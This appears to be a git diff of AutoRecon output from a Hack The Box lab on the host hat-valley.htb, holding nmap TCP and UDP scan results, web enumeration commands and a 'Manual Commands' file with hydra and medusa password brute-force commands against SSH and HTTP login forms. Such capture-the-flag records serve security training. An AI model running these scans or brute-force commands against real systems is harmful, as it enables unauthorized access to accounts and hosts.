2,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="SYN Stealth Scan" time="1675808315"/>
<taskend task="SYN Stealth Scan" time="1675808316" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1675808316"/>

15
HTB/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml Normal file
View File

@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Tue Feb 7 23:18:35 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/awkward/results/awkward.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/awkward.htb/scans/xml/_top_100_udp_nmap.xml awkward.htb" start="1675808315" startstr="Tue Feb 7 23:18:35 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="NSE" time="1675808315"/>
<taskend task="NSE" time="1675808315"/>
<taskbegin task="UDP Scan" time="1675808315"/>

0
HTB/awkward/results/hat-valley.htb/report/local.txt Normal file
View File

16
HTB/awkward/results/hat-valley.htb/report/notes.txt Normal file
View File

@@ -0,0 +1,16 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.

0
HTB/awkward/results/hat-valley.htb/report/proof.txt Normal file
View File

55
HTB/awkward/results/hat-valley.htb/report/report.md/hat-valley.htb/Commands.md Normal file
View File

@@ -0,0 +1,55 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_quick_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" hat-valley.htb
feroxbuster -u http://hat-valley.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://hat-valley.htb:80/.well-known/security.txt
curl -sSikf http://hat-valley.htb:80/robots.txt
curl -sSik http://hat-valley.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" hat-valley.htb
curl -sk -o /dev/null -H "Host: EGBPgNKZlNXXTPPMQaVH.hat-valley.htb" http://hat-valley.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://hat-valley.htb:80 2>&1
wkhtmltoimage --format png http://hat-valley.htb:80/ /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://hat-valley.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.hat-valley.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_hat-valley.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_quick_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" hat-valley.htb
feroxbuster -u http://hat-valley.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://hat-valley.htb:80/.well-known/security.txt
curl -sSikf http://hat-valley.htb:80/robots.txt
curl -sSik http://hat-valley.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" hat-valley.htb
curl -sk -o /dev/null -H "Host: huCKKYPfSgpWqvlEZXkR.hat-valley.htb" http://hat-valley.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://hat-valley.htb:80 2>&1
wkhtmltoimage --format png http://hat-valley.htb:80/ /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://hat-valley.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.hat-valley.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_hat-valley.htb_vhosts_subdomains-top1million-110000.txt"
```

67
HTB/awkward/results/hat-valley.htb/report/report.md/hat-valley.htb/Manual Commands.md Normal file
View File

@@ -0,0 +1,67 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://hat-valley.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h hat-valley.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://hat-valley.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://hat-valley.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h hat-valley.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://hat-valley.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h hat-valley.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://hat-valley.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://hat-valley.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://hat-valley.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h hat-valley.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://hat-valley.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://hat-valley.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h hat-valley.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://hat-valley.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h hat-valley.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://hat-valley.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://hat-valley.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_wpscan.txt"
```

8
HTB/awkward/results/hat-valley.htb/report/report.md/hat-valley.htb/Patterns.md Normal file
View File

@@ -0,0 +1,8 @@
Matched Pattern: Powered-By: Express
Identified HTTP Server: nginx/1.18.0 (Ubuntu)
Matched Pattern: Powered-By: Express
Identified HTTP Server: nginx/1.18.0 (Ubuntu)

70
HTB/awkward/results/hat-valley.htb/report/report.md/hat-valley.htb/Port Scans/PortScan - All TCP Ports.md Normal file
View File

@@ -0,0 +1,70 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
```
[/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt](file:///home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Feb 7 23:44:43 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml hat-valley.htb
adjust_timeouts2: packet supposedly had rtt of -426957 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -426957 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -432244 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -432244 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -434168 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -434168 microseconds. Ignoring time.
Nmap scan report for hat-valley.htb (10.10.11.185)
Host is up, received user-set (0.032s latency).
rDNS record for 10.10.11.185: awkward.htb
Scanned at 2023-02-07 23:44:44 CET for 56s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=
| 256 59365bba3c7821e326b37d23605aec38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Hat Valley
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 56BF0DDEA4641BFDDD743E1B04149554
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 2.6.32 (92%), Linux 5.0 - 5.3 (92%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 5.0 (90%), Crestron XPanel control system (90%), Linux 5.0 - 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/7%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E2D494%P=x86_64-pc-linux-gnu)
SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)
SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=N)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 45.425 days (since Sat Dec 24 13:34:05 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 29.03 ms 10.10.16.1
2 52.62 ms awkward.htb (10.10.11.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:45:40 2023 -- 1 IP address (1 host up) scanned in 56.65 seconds
```

53
HTB/awkward/results/hat-valley.htb/report/report.md/hat-valley.htb/Port Scans/PortScan - Top 100 UDP Ports.md Normal file
View File

@@ -0,0 +1,53 @@
```bash
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
```
[/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt](file:///home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Feb 7 23:44:43 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml hat-valley.htb
Warning: 10.10.11.185 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.185 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.185 from 200 to 400 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.11.185 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for hat-valley.htb (10.10.11.185)
Host is up, received user-set (0.040s latency).
rDNS record for 10.10.11.185: awkward.htb
Scanned at 2023-02-07 23:44:44 CET for 244s
Not shown: 87 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
17/udp open|filtered qotd no-response
19/udp open|filtered chargen no-response
68/udp open|filtered dhcpc no-response
136/udp open|filtered profile no-response
137/udp open|filtered netbios-ns no-response
999/udp open|filtered applix no-response
5000/udp open|filtered upnp no-response
5060/udp open|filtered sip no-response
5353/udp open|filtered zeroconf no-response
20031/udp open|filtered bakbonenetvault no-response
33281/udp open|filtered unknown no-response
49152/udp open|filtered unknown no-response
49186/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/7%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63E2D550%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 518/udp)
HOP RTT ADDRESS
1 32.44 ms 10.10.16.1
2 32.45 ms awkward.htb (10.10.11.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:48:48 2023 -- 1 IP address (1 host up) scanned in 245.28 seconds
```

Some files were not shown because too many files have changed in this diff Show More